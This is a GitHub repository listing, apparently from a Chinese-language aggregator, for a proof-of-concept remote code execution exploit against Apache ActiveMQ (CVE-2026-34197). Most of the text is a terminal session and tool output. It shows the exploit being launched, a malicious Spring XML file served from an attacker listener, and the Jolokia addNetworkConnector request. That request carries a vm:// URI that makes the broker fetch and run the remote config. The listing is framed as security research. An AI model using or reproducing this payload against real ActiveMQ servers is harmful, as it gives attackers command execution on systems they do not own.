dinosn/CVE-2026-34197
GitHub: dinosn/CVE-2026-34197
针对 Apache ActiveMQ CVE-2026-34197 漏洞的概念验证代码,利用 Jolokia 与 VM 传输机制实现远程命令执行。
Stars: 6 | Forks: 0
# CVE-2026-34197
CVE-2026-34197 activemq PoC
针对 ActiveMQ 的 PoC,基于 Horizon3 的文章
https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/
```
krasn@icestorm cve-2026-34197-activemq % docker compose up -d
krasn@icestorm cve-2026-34197-activemq % python3 exploit_poc.py auto \
--target http://localhost:8161 \
--lhost 192.168.1.17 --lport 9999 \
--cmd "touch /tmp/blahblah.txt"
======================================================================
CVE-2026-34197 — ActiveMQ RCE via Jolokia + VM Transport
For authorized security testing and research only.
======================================================================
[*] Target: http://localhost:8161
[*] Command: touch /tmp/blahblah.txt
[*] Serving malicious Spring XML on http://0.0.0.0:9999/evil.xml
[+] Jolokia accessible — agent version: unknown
[*] Could not discover broker name, using default 'localhost'
[*] Sending exploit payload to http://localhost:8161/api/jolokia/
[*] Malicious URI: static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Jolokia returned 200 — exploit payload delivered
[+] Response: {
"request": {
"mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
"arguments": [
"static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)"
],
"type": "exec",
"operation": "addNetworkConnector(java.lang.String)"
},
"value": "NC",
"timestamp": 1775616523,
"status": 200
}
[*] Waiting 5s for target to fetch payload...
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Done. Verify command execution on target.
```
标签:ActiveMQ, Apache ActiveMQ, Broker, CISA项目, CVE-2026-34197, Exploit, Jolokia, PoC, RCE, Spring XML, VM Transport, 中间件, 威胁模拟, 安全测试, 攻击性安全, 暴力破解, 概念验证, 消息队列, 漏洞复现, 编程工具, 网络安全, 请求拦截, 远程代码执行, 逆向工具, 隐私保护